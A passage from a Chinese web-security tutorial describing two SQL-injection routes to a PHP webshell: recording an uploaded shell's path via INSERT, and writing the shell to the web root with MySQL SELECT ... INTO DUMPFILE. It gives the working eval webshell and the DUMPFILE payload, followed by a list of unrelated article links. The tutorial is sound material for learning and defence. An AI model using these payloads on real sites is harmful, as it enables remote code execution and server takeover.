当前位置: 首页 > news >正文

WEB安全--SQL注入--上传webshell的其他方式

一、INSERT INTO基于数据写入的SQL注入

1.1、条件

1、Web应用提供上传文件功能,用户上传的文件路径会存储在数据库中

2、数据库内容可影响Web资源访问路径

3、用户有写的权限

1.2、示例

首先我们上传一个shell.php到web应用中,其内容为<?php @eval($_POST['cmd']); ?>

然后通过SQL注入:

-- 恶意注入
INSERT INTO uploads (file_path) VALUES ('/var/www/html/shell.php'); -- 写入Webshell路径

访问 http://target.com/shell.php 后,通过POST方式传入 cmd 参数,即可执行恶意PHP代码。

二、SELECT INTO DUMPFILE基于备份与还原的SQL注入

1.1、条件

1、开启file权限(默认不开放)

2、Web服务器用户需有写权限

3、secure_file_priv为空(默认为NULL,NULL不是空)

1.2、示例

-- 正常查询
SELECT data FROM users WHERE id=1;

-- 恶意注入
SELECT '<?php @eval($_POST["cmd"]); ?>' INTO DUMPFILE '/var/www/html/shell.php';

补充:与into outfile不同,into dumpfile直接写入文件,没有任何格式化处理,而into outfile会自动添加换行符、制表符,会破坏webshell。

http://www.dtcms.com/a/108512.html

相关文章:

  • QT_xcb 问题
  • java问题
  • 《Viewport:解析与优化,提升网页体验的关键要素》
  • ETLCloud是如何通过Oracle实现CDC的?
  • Elasticsearch 报错index_closed_exception
  • JavaScript Array(数组)
  • LVGL实现一个简易画图板
  • OSPF的Broadcast网络类型
  • [论文笔记] Deepseek技术报告解读: MLAMTP
  • Ubuntu与本地用户交流是两种小方法
  • 一个c#的简单日志记录类,避免使用Nuget依赖
  • Zabbix_agent自动注册教程!
  • 利用 PHP 爬虫按关键字搜索淘宝商品
  • uni-app 微信小程序 WebSocket 接入讯飞语音合成(流式版)WebAPI 示例
  • 【Redis】如何处理缓存穿透、击穿、雪崩
  • 在 Blazor 中使用 Chart.js 快速创建数据可视化图表
  • 大模型生成浏览器端的初级俄罗斯方块
  • 美团民宿 mtgsig 小程序 mtgsig1.2 分析
  • Unity中的C#脚本中文字符无法正常显示问题
  • mysql-创建和删除索引的两种方式
  • 针对 MySQL 数据库中 主键/唯一约束的更新方法 和 ON DUPLICATE KEY UPDATE 语法的详细说明及示例,并以表格总结
  • YOLOv11区域检测
  • Element Plus 常用组件
  • 超越人工智能驱动的网络攻击:现代防御者的策略
  • 电子电气架构 --- 智能座舱域控设计
  • Flutter 音视频播放器与弹幕系统开发实践
  • RK3588使用笔记:USB转232、485、422模块驱动适配
  • [蓝桥杯 2024 省 A] 训练士兵
  • 虚拟试衣间-云尚衣橱小程序-衣橱管理实现
  • 算法:二进制求和